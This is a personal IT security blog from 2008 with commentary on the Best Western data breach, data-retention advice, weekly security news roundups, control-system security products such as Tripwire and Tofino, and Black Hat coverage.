Bill’s Security Blog

From the Phoenix Business Journal:
Best Western disputes security breach story

Best Western disputes the story, saying there was an isolated incident at a hotel in Germany.

“There was one instance of suspicious activity at a single hotel with respect to 13 guests, who are being notified. We are working with the FBI and international authorities to investigate the source of the other claims, which were never presented to us for investigation prior to publication of the Herald story. We have found no suspicious activity to support them,” said Best Western external communications director Troy Rutman.

Rutman said hotel guest information is protected by a network of firewall and protocols.

“Network of firewall and protocols” - we’ve heard that story before.

Guess if they are indeed working with the FBI, then they won’t be able to hide from the requirement for data breach notifications as mandated by several states.

The saga continues.

Bill

From the UK’s vnunet.com:
Hackers breach Best Western in data heist

It seems the hacker managed to insert a Trojan into the computers of a hotel and logged the user name and password of someone with sufficient security clearance to gain access to corporate servers.

Interesting, but not ingenious.

It does seem to indicate that the attack was target explicitly at data theft, rather than someone stumbling across a SQL injection attack vector.

How could defense-in-depth have helped here?

I guess we still need to learn a little more about how the attack progressed.

• Did the user get remote access to the SQL server?
• Was the website capable of retrieving this type of data if the user login credentials were sufficient?
• Did the attacker’s trojan dial out to a remote server allowing the perpetrator to take complete remote control of the box?
• Even if he had full remote control, was there any content filtering in place to prevent that data from traveling over the network? I guess the attacker could have encrypted the channel…

More from SecurityFocus.com:
Denial, hype cloud report of Best Western breach

“We can confirm that on August 21, 2008, three separate attempts were made via a single log-on ID to access the same data from a single hotel,” the company said in a statement released late Monday. “The hotel in question is the 107-room Best Western Hotel am Schloss Kopenick in Berlin, Germany, where a Trojan horse virus was detected by the hotel’s antivirus software.  The compromised log-in ID permitted access to reservations data for that property only. The log-in ID was immediately terminated, and the computer in question has been removed from use.”

Best Western said that it had narrowed down the number of customers affected to 10.

.

Motivating my thinking is yet another data breach.

This time, reported by Scotland’s Sunday Herald in an article:
Revealed: 8 million victims in the world’s biggest cyber heist

Target:
Best Western Hotels

What was lost:

Amounting to a complete identity-theft kit, the stolen data includes a range of private information including home addresses, telephone numbers, credit card details and place of employment.

According to Bill Brenner of SearchSecurity’s analysis of the 2007 Ponemon Institute study on data breach costs, the average cost of a data breach was roughly $200 per record.

The expected cost to Best Western: 8,000,000 records X $200/record = $1.6 billion dollars USD.

Now, none of this is rocket science.

Research on the cost of a data breach is published regularly, and most companies can easily determine their total number of potential records.

Looking at a bedrock equation of information security:
Risk = threat x vulnerability x cost

We’ve already got the cost, and it should be assumed that an organization like Best Western should expect the threat of being attack to be very high.

Last is the Vulnerability component.  The vulnerability is the loss of personally identifiable information up to and including the loss of credit card data.

While an organization like Best Western may not be able to affect the threat and cost components, they sure can do a lot on the vulnerability front.

They can do that through a number of mechanisms, both technical and non-technical (insurance and whatnot), and hence reduce the total risk.

I’ll focus on a few simple things:

1) Determine what is the most costly data to loose

Certainly, does an organization need to maintain the credit card information of every patron after they have cleared their tab?

If so, should that data be encrypted?

And should access permissions be put in place that prevent bulk reads from the database account servicing the website?

How much non-credit card customer history information do you really need to use for business analysis?

If  you don’t need more than 3 months of client data, then archive the rest off-disk.

The rule of thumb in this area, is that if the data isn’t critical for business operation, then get rid of it, securely!

2) Analyze insider access

Who/what, internally, has need-to-know access to the data?

How much access do they need?

Are policies, procedures and technical controls in place to prevent unauthorized access?

3) Analyze partner access

What partners have access to the data?

Exactly what data do they need?

Are they accessing the data using accounts that forbid unauthorized access to information they shouldn’t see?

What is the partner’s security policy for dealing with this information?  Can you trust them?

4) Review policies, procedures, and do validation

Regular review of policies and procedures should be performed.

And most importantly, routine validation of the system should be performed.

A validation check should be a timed, and triggered event.  It should be timed regularly to ensure that it actually happens.  And it should be triggered by such things as: a new partner added; a DBA is terminated; a new contractor is hired…

5) Assume the worst will happen

Because it will.

Bill

A weekly snapshot of what’s been talked about in the IT Security realm over the past week.

Attacks

Adobe Flash ads launching clipboard hijack attack - From the ZDNet Zero Day blog:

Malicious hackers are using booby-trapped Flash banner ads to hijack clipboards for use in rogue security software attacks.

In the Web attacks, which target Mac, Windows and Linux users running Firefox, IE and Safari, hackers are seizing control of the machine’s clipboard and using a hard-to-delete URL that points to a fake anti-virus program.

According to victims on several Web forums, the attack is coming from Adobe Flash-based advertising on legitimate sites — including Newsweek, Digg and MSNBC.com.

We’ve all got Flash.  Keep it patched, though I haven’ t yet heard if there is a patch available for this attack vector.

Bypassing .NET’s ValidateRequest security feature

The Microsoft .NET framework comes with a request validation feature, configurable by the ValidateRequest setting. ValidateRequest has been a feature of ASP.NET since version 1.1. This feature consists of a series of filters, designed to prevent classic web input validation attacks such as HTML injection and XSS (Cross-site Scripting).

This paper introduces script injection payloads that bypass ASP .NET web validation filters and also details the trial-and-error procedure that was followed to reverse-engineer such filters by analyzing .NET debug errors.

We have a lot of .NET here, and my team is studying this paper.

Breaking News
From the Scottish Sunday Herald, “Revealed: 8 million victims in the world’s biggest cyber heist”

EXCLUSIVE: Sunday Herald uncovers theft of data from every guest in 1300 Best Western Hotels in past 12 months
By Iain S Bruce

AN INTERNATIONAL criminal gang has pulled off one of the most audacious cyber-crimes ever and stolen the identities of an estimated eight million people in a hacking raid that could ultimately net more than £2.8billion in illegal funds.

A Sunday Herald investigation has discovered that late on Thursday night, a previously unknown Indian hacker successfully breached the IT defences of the Best Western Hotel group’s online booking system and sold details of how to access it through an underground network operated by the Russian mafia.

It is a move that has been dubbed the greatest cyber-heist in world history. The attack scooped up the personal details of every single customer that has booked into one of Best Western’s 1312 continental hotels since 2007.

Amounting to a complete identity-theft kit, the stolen data includes a range of private information including home addresses, telephone numbers, credit card details and place of employment.

This raises (again) some important issues for the IT and corporate space.  How much data should you keep about your clients, and for how long?

Now matter how good your defense-in-depth, someone will get through.  What will you allow them to find?

I’ll blog more on this later.

Older News
Students from MIT that were going to do a talk at DefCon were stopped by a court order.

Their research showed how to subvert the Massachusetts Bay Transit Authority payment card system.

As a part of court filings, their full research was included.  Court documents are public domain, so, MBTA essentially released what they were trying to hide.

On the 19th, a judge lifted the restraining order, so the students are free to talk.

Will be interesting to see what happens.

I think this is the second time in the past few months where ‘private’ information was included in court filings and hence into the public domain.

Tools

Grendel-Scan - released at DefCon, this is a sophisticated, automated, Open Source web application penetration testing tool.

It appears to rival commercial tools.

I’ll be playing with this soon, I hope.

Countermeasures

Reduce attack surface!
Why allow access to anything by anyone who doesn’t absolutely need it.

Cyber Warfare
Some discussions resulting from the attacks of Georgian IT infrastructure by Russian hackers during the past few weeks.

Conclusion seems to be: we don’t have a real definition of what cyber war is, so it isn’t really warfare.

In my mind, true cyber warfare is using attacks against IT infrastructure as a force multiplier, or as a means of applying coercive pressure to an enemy of the state.

I do not think that the attackers have to be state sponsored.

Some would debate whether or not a DDOS is an act of warfare.  I say it is if it is intended to achieve: apply a coercive pressure to an enemy of the state.

A DDOS against a critical communications network, or safety critical control system would certainly qualify.  A DDOS against a n00b’s website, perhaps not.

On the Horizon

With elections right around the corner, I’m sure we will see the debate over electronic voting heat up.

Bill

According to Wall Street Journal’s MarketWatch, Waterfall Solutions will be presenting at the 2008 PCSF.

In a presentation on Wednesday, August 27th, Mr. Turniansky will give a detailed presentation on the topic of “Unidiresctional Connectivity - A Novel Robust Method for Absolute Protection of Process Control Systems”.

Some are too willing to throw out the notion of unidirectional communication in a control system because it requires some special configuration.

My take is that if you want Real security, you must consider the overwhelming value of a one-way communication link, particularly when critical control systems come into place.

In control networks, there are some devices, like sensors and other detectors, that simply generate traffic.  They do not need to receive anything.

Another possibility is to prevent two way traffic between systems at higher and lower levels of “criticality.”

A no-brainer example would be to employ one way communication between the contol network and the corporate network.  This would allow business units to monitor the control network, but not have data (and attacks) flow from the business side back.

This would have prevented the shutdown of Unit 2 of the Hatch nuclear power plant earlier this year.

From the Washington Post’s “Cyber Incident Blamed for Nuclear Power Plant Shutdown”

A nuclear power plant in Georgia was recently forced into an emergency shutdown for 48 hours after a software update was installed on a single computer.

The incident occurred on March 7 at Unit 2 of the Hatch nuclear power plant near Baxley, Georgia. The trouble started after an engineer from Southern Company, which manages the technology operations for the plant, installed a software update on a computer operating on the plant’s business network.

Though I don’t know all the details, it’s clear that there was some computer on the business network that must have, through some route, been able to feed back to the control network.

Why introduce the potential for a network based attack on one of these devices, simply employ one-way communication.

Method’s I’ve heard about in the past include physically modifying the network cabling so that the cable is physically incapable of sending traffic in both directions.

In any event, I wont’ be at PCSF, but hope the presentation is available.

Bill

Looks like Russell Beck, an intelligence analysis and modeling student over at Penn State is doing some interesting research on what went down between Russia and Georgia.

He gets into some nitty gritty, and is definitely making a detailed review of the facts.

“Russia vs. Georgia: The War We Didn’t See — Part 1”

This is the first of what Russell says will be a several part series.

I’ll post links whenever he posts additional articles.

Bill

I had a long list of titles for this one…

• Tax dollar - Fail
• How to spend a whole lot of money for nothing
• Movie plot software (in a nod to Schneier’s Movie Plot Threats)

Below are some quotes from the article.  I’ll focus on the simple capability of the system, and will leave to others a discussion of the significant privacy issues involved.

Source: “Dalhousie to help U.S. catch cyber terrorists” - The ChronicleHerald Metro section on August 22…

 A major software project is underway by the U.S. Department of Homeland Security to monitor levels of Internet traffic and detect possible security breaches — and Dalhousie University is going to help build it.

“We’re just looking at bytes and addresses.”

Mr. McHugh said the new software will be used by government and businesses to monitor who’s trying to access their computer networks. It will look at the amount of information being sent from network to network and turn that complex raw data into some type of graph or chart.

Analysts will read those charts and look for patterns that can help reveal the work of hackers, spammers and cyber terrorists. Mr. McHugh said shady characters on the web will often contact hundreds of different Internet addresses, trying to look for weaknesses or important places to target. Sometimes they’ll try to contact addresses that aren’t even hooked up to a machine.

“If you try to make contact to a lot of addresses where there are no machines, it indicates you’re probing around the network because you don’t know what’s there,” Mr. McHugh explained Thursday.

The technology could eventually be used to track child pornographers, Mr. McHugh said. From a known child pornography site, the program could follow the trail back to an offender’s computer.

Carrie Gates is a Canadian computer scientist and Dalhousie alumnae working at CA Labs in New York. Researchers there and in Halifax work together on the project. She said once the software is complete, it will be released to the public so anyone can use it to monitor their computer networks.

Ok, so let me summarize:

• The system will be used by: government, companies, and individuals.
• The system will only look at source, destination, and packet size.
• The system will only reveal the ISP source.

I have lots of issues with this.

First, if you are a company or individual, then this system is nothing more than a glorified firewall.  It’s not even an IDS, since it does not do anything but reporting.

Install a firewall and Snort, and call it a day.  If you are really interested, look at the logs/alerts once in a while.  This new system is useless for you.

If you are the Government, then you can, if you can get this thing installed in the right place, monitor traffic at a high enough level to determine some anomalous or suspect activity.

But can you tell the source of the attacker?

This leads to my second issue, suppose you can get this device at some sort of critical juncture in the Net, can you really track a hacker?

Let’s consider this for a second.  They may really be on to something.

Oh, wait: TOR, okbye.

Third.  Well, now that I think this device is completely useless, they could tweak it a little and make it useful.

They could put some content filtering on it and use it to kill spam.

But I think there might already be solutions for this, blink, blink.

Ah well, back to the drawing board.

Bill

This afternoon I tuned-in to a presentation by Tripwire regarding the upcoming release of a NERC CIP policy compliance module that’s due out September 16 for their Tripwire Enterprise product.

I had used Tripwire back in it’s open source days.  Back then it was all host-based integrity checking.  And that was a Long time ago.  I kind of long for those days.  The product was simple and reliable.  Host based integrity checking, IMHO is still a cornerstone of good security, and I have yet to find a suitable small-footprint replacement.

I must admit that I fell out of touch with the product after it went closed-source and they started building a business around it.

Well, the little script that was has turned into a rather mature, end-to-end, device agnostic policy auditing and compliance solution.  Tripwire can audit firewall configurations, router configs, hosts, you name it.

Their Enterprise product is modular, allowing you to install pre-built policy checks for tons of stuff (PCI, CIS, FISMA, COBIT, SOX, ISO 27001, FDCC), or build custom checks.

The purpose of this particular presentation was to learn about a new policy compliance module geared toward evaluating compliance with NERC CIPs.

The North American Electric Reliability Corporation (NERC) Critical Infrastructure Protection (CIP) standards are given, essentially, force of law by the Federal Energy Regulatory Commission (FERC).

I don’t want my reader’s eyes to glaze over, as frequently happens when discussing the myriad of regulatory bodies in the energy space, so I’ll break it down for you:

$1,000,000 per day, per infraction for failure to be in compliance with NERC CIPs.

Let me see if I can explain that in plain English:

$1,000,000 per day, per infraction for failure to be in compliance with NERC CIPs.

The Tripwire policy module focuses on compliance for the technical CIP’s (CIPs 002 to 009, with a focus on 003, 003-6, 005, 007).

Tripwire has a matrix mapping their compliance and auditing checks against the specific NERC CIP requirements, and provides a holistic approach to auditing and assessment.

One nice feature is that where non-compliance is detected, remediation recommendations are presented that can then be attached to a change order so that technicians can implement the recommendations.

The Tripwire people also discussed their products ability to maintain the required auditing and compliance documentation for the minimum required one year.

Concerns

It wouldn’t be one of my posts if I didn’t express some concerns :)

I have two:

1) Does the Tripwire product require an installation on the devices to be audited.

Though I’m not a control system guy, I have heard that some of these devices are extremely ‘fragile’.  Certainly no one wants to install a security module that decreases the availability or integrity of a control system device.

I also get nervous because, in some cases, making any modification to a control device can trigger a rather nightmarish change control process that has serious cost and can have serious regulatory implications.

2) Does the Tripwire system generate a great deal of network load while checks are run.

Again, the worry here is that, from what I’ve read, some control networks are extremely sensitive to latency and load.

Spikes in network traffic or device load can have negative consequences.

Special consideration must be given when considering implementing an automated, scheduled auditing system.

Competitors?

Tripwire is a household name in the IT security space, but are there other solutions out there?

Certainly.

Whereas Tripwire is coming from the IT security space, Digital Bond is a control system security research and consulting outfit that, well, specializes in control system security.

Our friends over at Digital Bond have been developing the Bandolier product.

At the moment, the focus of the product seems to be heavily weighted on the assessment side.  Nevertheless, there is documentation on how to use Bandolier to test for compliance with the NERC CIP’s.

I expect that as the Bandolier product matures, automated CIP compliance reports may be generated from the product.

Conclusions

I first got interested in control system/criticil infrastructure protection when I began hearing reports of what I perceived to be complete failures of security surrounding SCADA and other control systems.

The more I research, though, I see that there is a lot of work being done in this relatively small space.

And I read more and more about vendors coming to the table.

One neat trend I’m seeing… Vendors who build control system hardware are coming to security outfits with their wares asking for help on how to make them more secure.

Now that’s good stuff right there.

Bill

Updated 20080627:

More vendors joining the automated NERC CIP compliance front:
Nexant, Promia to Offer Compliant Cyber Security to Energy Firms

Black Hat/Defcon Coverage

Lots of analysis of the Black Hat presentation by Mark Dowd of IBM’s ISS and Alexander Sotirov of VMWare about circumventing Vista security.

Essentially, they discovered a way to completely subvert most of Vista’s built in low-level security systems.

Let’s hope Microsoft gets it right in their next OS…

Note, there’s some people saying it isn’t a big deal.  Time will tell.

Here’s the summary from speaker’s list of Black Hat USA 2008:

Over the past several years, Microsoft has implemented a number of memory protection mechanisms with the goal of preventing the reliable exploitation of common software vulnerabilities on the Windows platform. Protection mechanisms such as GS, SafeSEH, DEP and ASLR complicate the exploitation of many memory corruption vulnerabilities and at first sight present an insurmountable obstacle for exploit developers.

This talk aims to present exploitation methodologies against this increasingly complex target. We will demonstrate how the inherent design limitations of the protection mechanisms in Windows Vista make them ineffective for preventing the exploitation of memory corruption vulnerabilities in browsers and other client applications.

More coverage:

• Bruce Schneier - Bypassing Microsoft Vista’s Memory Protection
• Search Security - Researchers use browser to elude Vista memory protections

Attack Trends

I keep up to date on the NIST’s National Vulnerability Database, updates to the milw0rm exploit database, and many others.

Though I don’t read all the alerts in detail (there are usually about 40 per day), I do try to scan enough to get an idea of what’s being disclosed.

The bulk seem to be SQL Injection Vulnerabilities or Cross Site Scripting (XSS).

These attacks can be very potent.

SQL injection can lead to information disclosure, unauthorized data modification, and data loss.

SQL injection attacks run through the browser and web server directly to the database.

XSS involves, generally, inserting script into URL’s or user input form fields that, when viewed by others, causes the script to run.  The scripts can run in the context of the user’s browser security zone, and has access to all cookies and whatnot.

Both types of attacks are difficult to deal with using “security tools.”  Most host-based intrusion detection systems (antivirus, anti-spiware, etc) are useless.

In both cases, application modifications need to be made.  Additionally, layer 7 firewalls can be employed to try to prevent these types of attacks.

From a defense-in-depth perspective, both approaches should be employed.

On another front, attacks against social networking sites continue.

As more and more private data gets into these online resources, they become a more attractive target for attackers.

New Attack Vectors

Kris Kaspersky of Kaspersky labs has uncovered flaws in Intel processors that allow remote attackers to execute arbitrary code on any computer that uses the flawed processor.

Man, that’s crazy stuff…

I wrote a blog post about it, “Why agro the OS when you can pwn the hardware?”

Bill

Processingtalk.com posted an article describing new passive monitoring module for the Tofino security product.

Sounds pretty neat.

When it discovers a new device, it prompts the system administrator to either accept its deductions and insert the new device into the network inventory diagram, or flag the device as a potential intruder.
…
It also guides the user through creating appropriate firewall rules to allow or block messages, based on what it has learned about the network traffic.

Technical complexities such as IP addressing and TCP/UDP port numbers are managed behind the scenes, making the normally byzantine art of firewall configuration easy for the controls professional.

I guess there’s been a history of typical IT security tools wreaking havoc on control systems:

In 2005, Sandia National Laboratories released a report describing a number of serious events from use of these tools, including this example: “A ping sweep was being performed to identify all hosts that were attached to the network, for inventory purposes, and it caused a system controlling the creation of integrated circuits in the fabrication plant to hang.

The outcome was the destruction of USD50K worth of wafers”.

A concern I’d have about a product like this is the need to assume that all the systems on the network are trusted at the time you are configuring the rule set.

Another is that caution must be used when such a device is operating in the presence of safety systems.

This system has the capacity to block communication, and in a safety system, that could be hazardous.

But all things considered - much of the control system infrastructure seems to be “tough to secure” without unacceptably high cost.

Bolt-on security is rarely effective, but if the system offsets sufficient risk, they may provide the needed security.

It’s also nice to see a product that doesn’t require the user to have in-depth knowledge of protocols and firewall configuration.

If the control systems people know the devices on their networks, what they do, and which devices should be communicating to which other devices, the Tofino product may be a big help.

If that’s not the case, then the product may be of little value, and simply help provide a false sense of security.

It would be good if Tofino creator Byres Security offered some kind of auditing process to verify that users are implementing the system correctly.

Bill